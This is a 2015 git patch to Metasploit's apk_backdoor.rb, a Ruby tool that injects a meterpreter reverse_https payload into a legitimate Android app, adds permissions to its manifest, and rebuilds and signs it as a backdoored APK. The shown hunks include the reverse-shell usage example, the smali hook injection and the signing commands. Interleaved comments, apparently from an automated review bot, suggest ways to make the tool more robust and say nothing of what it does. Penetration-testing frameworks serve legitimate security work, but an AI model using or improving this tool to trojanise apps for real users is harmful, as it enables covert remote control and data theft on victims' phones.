From d1ed363a94a0e93252d1e9c634d5355595935f74 Mon Sep 17 00:00:00 2001
From: Tim
Date: Tue, 22 Dec 2015 06:10:15 +0000
Subject: [PATCH] clean up apk_backdoor.rb

---
 tools/exploit/apk_backdoor.rb | 18 ++++++++++--------
 1 file changed, 10 insertions(+), 8 deletions(-)

diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb
index 18401b380d..c0d461d6d6 100755
--- a/tools/exploit/apk_backdoor.rb
+++ b/tools/exploit/apk_backdoor.rb
@@ -11,6 +11,10 @@
 require 'fileutils'
 require 'optparse'
 require 'open3'
+def usage
+ $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
+ $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
+end

 def run_cmd(cmd)
 begin
@@ -142,8 +146,7 @@ end

 apkfile = ARGV[0]
 unless apkfile && File.readable?(apkfile)
- $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
- $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
+ usage
 exit(1)
 end

@@ -173,9 +176,8 @@ begin
 opts+=" "
 }
 rescue
- $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
- $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
 $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n"
+ usage
 exit(1)
 end

@@ -183,7 +185,7 @@ end

 tempdir = Dir.mktmpdir
 print "[*] Generating msfvenom payload..\n"
-msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom"))
+msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom"))
 res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1")
 if res.downcase.include?("error")
 $stderr.puts res
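Review bot: The new `usage` helper (hunk at -11) keeps the explicit `\n` on each `$stderr.puts` string, which is redundant because `puts` only appends a newline when the string does not already end with one, so the two lines could simply be `warn "Usage: #{$0} [target.apk] [msfvenom options]"` and `warn "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"`. The helper has no header comment; a one-liner such as `# Print CLI usage to stderr; callers are expected to exit(1) afterwards.` would document the contract both call sites rely on. Both callers (hunks at -142 and -173) follow `usage` with `exit(1)`, so an `exit(1)` inside the helper, or a `usage_and_exit` variant, would remove that repetition if the maintainers prefer. Note that the hunk at -173 now prints usage after the error line while the hunk at -142 prints it before exiting; that looks deliberate but is worth a word in the commit message. `def usage` is complete within the hunk; `run_cmd` starts here and continues outside it.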
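Review bot: The corrected `msfvenom_path` (hunk at -183, now two directories up, consistent with the script living in tools/exploit/) is still handed to `run_cmd` without any check that the binary exists, so a wrong path surfaces only as the shell's "not found" / "No such file or directory" text, which the following `res.downcase.include?("error")` test does not appear to match, and the script would presumably go on to apktool with no payload generated. A guard right after the assignment closes that gap: `abort("[-] msfvenom not found at #{msfvenom_path}") unless File.executable?(msfvenom_path)`. The path expression itself can be written more directly as `msfvenom_path = File.expand_path("../../msfvenom", __dir__)`, which is equivalent and easier to read. `run_cmd` is defined outside this hunk, so what it returns on a failed spawn is inferred here, not verified.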
@@ -230,14 +232,14 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/ hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } -injected_apk=apkfile.split(".")[0] + "_backdoored.apk" +injected_apk = apkfile.sub('.apk', '_backdoored.apk') print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) -print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" +print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk} ..\n" +print "[*] Signing #{injected_apk}\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") FileUtils.remove_entry tempdir